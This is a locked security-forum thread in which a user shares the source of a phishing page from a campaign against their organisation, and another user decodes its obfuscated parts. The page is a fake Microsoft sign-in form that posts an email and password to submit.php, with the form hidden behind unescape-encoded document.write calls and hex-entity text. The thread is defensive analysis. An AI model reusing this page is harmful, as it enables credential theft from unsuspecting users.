This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

malicious encoded javascript in website source code

Hi,

can you decrypt this code lines seen in a recent pishing campaing hitting us?

Partially base64 encoded javascript, variables for something called spoguestaccess which makes me nervous and so on.

What does it do? Download payload? Currently not detected by Intercept-X

PS: also have a case open for this

sourcecode1.txt

sourcecode2.txt

<!DOCTYPE html>
<html>
<head>
	<title>&#x53;&#x69;&#x67;&#x6E;&#x20;&#x69;&#x6E;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
	<meta name="robots" content "none">
	<meta name="Googlebot" content="nofollow">
	<meta name="robots" content "noindex, nofollow">
	<link rel="shortcut icon" type="icon" href="images/favicon.png">
	<link rel="stylesheet" type="text/css" href="style.css">
	<script type="text/javascript" src="js/jquery.js"></script>	
	
</head>

<body>
<script type="text/javascript">
<!--
document.write(unescape('%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6F%76%65%72%6C%61%79%22%3E%0A%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6C%6F%67%69%6E%2D%62%6F%78%22%3E%0A%09%09%09%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%73%2F%6D%73%2D%6C%6F%67%6F%2D%76%32%2E%6A%70%67%22%20%61%6C%74%3D%22%6C%6F%67%6F%22%3E%0A%09%09%09%3C%64%69%76%20%69%64%3D%22%69%64%65%6E%74%69%74%79%22%20%63%6C%61%73%73%3D%22%69%64%65%6E%74%69%74%79%2D%62%61%6E%6E%65%72%22%3E'));
//-->
</script>
			
				<div id="identity-name" class="identity">
					&nbsp;&nbsp;&nbsp;<img src="images/arrow.png" alt="arrow">&nbsp;&nbsp;&nbsp;&nbsp;golllel@byom.de				</div>
				
				
			</div>

			<h2 id="title" style="color:#231E17;"><strong>&#x45;&#x6E;&#x74;&#x65;&#x72;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64;</strong></h2>
			<p id="message" class="message"></p>

<script type="text/javascript">
<!--
document.write(unescape('%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%61%64%65%72%22%20%63%6C%61%73%73%3D%22%6C%6F%61%64%65%72%20%68%69%64%64%65%6E%22%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%3C%2F%64%69%76%3E'));
//-->
</script>

			<form action="submit.php" method="post">
				<input type="hidden" id="email" name="email" value="golllel@byom.de">
<script type="text/javascript">
<!--
document.write(unescape('%09%09%09%09%3C%69%6E%70%75%74%20%69%64%3D%22%70%61%73%73%77%6F%72%64%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%6E%61%6D%65%3D%22%70%61%73%73%77%6F%72%64%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%20%72%65%71%75%69%72%65%64%20%61%75%74%6F%66%6F%63%75%73%3E%0A%09%09%09%09%0A%09%09%09%3C%62%72%3E%0A%0A%09%09%09%3C%64%69%76%20%69%64%3D%22%67%72%6F%75%70%32%22%3E%0A%09%09%09%09%0A%09%09%09%09%3C%73%6D%61%6C%6C%20%69%64%3D%22%66%70%73%22%3E%3C%61%20%68%72%65%66%3D%22%23%22%20%63%6C%61%73%73%3D%22%66%61%64%65%22%3E%26%23%78%34%36%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%37%3B%26%23%78%36%46%3B%26%23%78%37%34%3B%26%23%78%32%30%3B%26%23%78%36%44%3B%26%23%78%37%39%3B%26%23%78%32%30%3B%26%23%78%37%30%3B%26%23%78%36%31%3B%26%23%78%37%33%3B%26%23%78%37%33%3B%26%23%78%37%37%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%34%3B%3C%2F%61%3E%3C%2F%73%6D%61%6C%6C%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%0A%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%3C%69%6E%70%75%74%20%69%64%3D%22%73%69%67%6E%69%6E%22%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%6E%61%6D%65%3D%22%73%69%67%6E%69%6E%22%20%76%61%6C%75%65%3D%22%53%69%67%6E%20%69%6E%22%3E%0A%09%09%09%3C%2F%66%6F%72%6D%3E%0A%09%09%3C%2F%64%69%76%3E%0A%09%3C%2F%64%69%76%3E%0A%0A%09%3C%66%6F%6F%74%65%72%3E%0A%09%09%3C%75%6C%3E%0A%09%09%09%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%23%22%3E%26%23%78%35%30%3B%26%23%78%37%32%3B%26%23%78%36%39%3B%26%23%78%37%36%3B%26%23%78%36%31%3B%26%23%78%36%33%3B%26%23%78%37%39%3B%20%26%20%26%23%78%36%33%3B%26%23%78%36%46%3B%26%23%78%36%46%3B%26%23%78%36%42%3B%26%23%78%36%39%3B%26%23%78%36%35%3B%26%23%78%37%33%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%09%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%23%22%3E%26%23%78%35%34%3B%26%23%78%36%35%3B%26%23%78%37%32%3B%26%23%78%36%44%3B%26%23%78%37%33%3B%26%23%78%32%30%3B%26%23%78%36%46%3B%26%23%78%36%36%3B%26%23%78%32%30%3B%26%23%78%37%35%3B%26%23%78%37%33%3B%26%23%78%36%35%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%09%3C%6C%69%3E%3C%61%3E%26%63%6F%70%79%3B%26%23%78%33%32%3B%26%23%78%33%30%3B%26%23%78%33%32%3B%26%23%78%33%30%3B%26%23%78%32%30%3B%26%23%78%34%44%3B%26%23%78%36%39%3B%26%23%78%36%33%3B%26%23%78%37%32%3B%26%23%78%36%46%3B%26%23%78%37%33%3B%26%23%78%36%46%3B%26%23%78%36%36%3B%26%23%78%37%34%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%3C%2F%75%6C%3E'));
//-->
</script>
	</footer>

</body>
</html>

Regards



This thread was automatically locked due to age.
  • I think sourcecode1 is the more interesting file. Don't know why sourcecode 2 is automatically extended here.

  • The document.write sections are just parts of the web page.  I guess to obfuscate the form.  E.g.


    document.write 1

    <div class="overlay">
    <div class="login-box">
    <img src="images/ms-logo-v2.jpg" alt="logo">
    <div id="identity" class="identity-banner">"

    document.write 2

    <div id="loader" class="loader hidden">
    <div class="circle"></div>
    <div class="circle"></div>
    <div class="circle"></div>
    <div class="circle"></div>
    <div class="circle"></div>
    </div>

    document.write 3

    <input id="password" type="password" name="password" placeholder="Password" required autofocus>

    <br>

    <div id="group2">

    <small id="fps"><a href="#" class="fade">&#x46;&#x6F;&#x72;&#x67;&#x6F;&#x74;&#x20;&#x6D;&#x79;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64;</a></small>
    <br>
    <br>
    <br>

    </div>
    <input id="signin" type="submit" name="signin" value="Sign in">

    </form>
    </div>
    </div>

    <footer>
    <ul>
    <li><a href="#">&#x50;&#x72;&#x69;&#x76;&#x61;&#x63;&#x79; & &#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x73;</a></li>
    <li><a href="#">&#x54;&#x65;&#x72;&#x6D;&#x73;&#x20;&#x6F;&#x66;&#x20;&#x75;&#x73;&#x65;</a></li>
    <li><a>&copy;&#x32;&#x30;&#x32;&#x30;&#x20;&#x4D;&#x69;&#x63;&#x72;&#x6F;&#x73;&#x6F;&#x66;&#x74;</a></li>
    </ul>

    ==

    You can put these all together to get an idea of the page.

  • I suppose going a little further, the other "strings" are:

    The title:
    &#x53;&#x69;&#x67;&#x6E;&#x20;&#x69;&#x6E;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74; =  "Sign in to your account" 

    &#x45;&#x6E;&#x74;&#x65;&#x72;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64; = Enter password

    &#x46;&#x6F;&#x72;&#x67;&#x6F;&#x74;&#x20;&#x6D;&#x79;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64; = Forgot my password

    &#x50;&#x72;&#x69;&#x76;&#x61;&#x63;&#x79; & &#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x73; = Privacy & cookies

    &#x54;&#x65;&#x72;&#x6D;&#x73;&#x20;&#x6F;&#x66;&#x20;&#x75;&#x73;&#x65 = Terms of use

    &copy;&#x32;&#x30;&#x32;&#x30;&#x20;&#x4D;&#x69;&#x63;&#x72;&#x6F;&#x73;&#x6F;&#x66;&#x74; = ©2020 Microsoft

  • Thank's a lot for your time and efford checking the code lines. So does'nt look too bad. I guess there was no hidden downloader on those pages.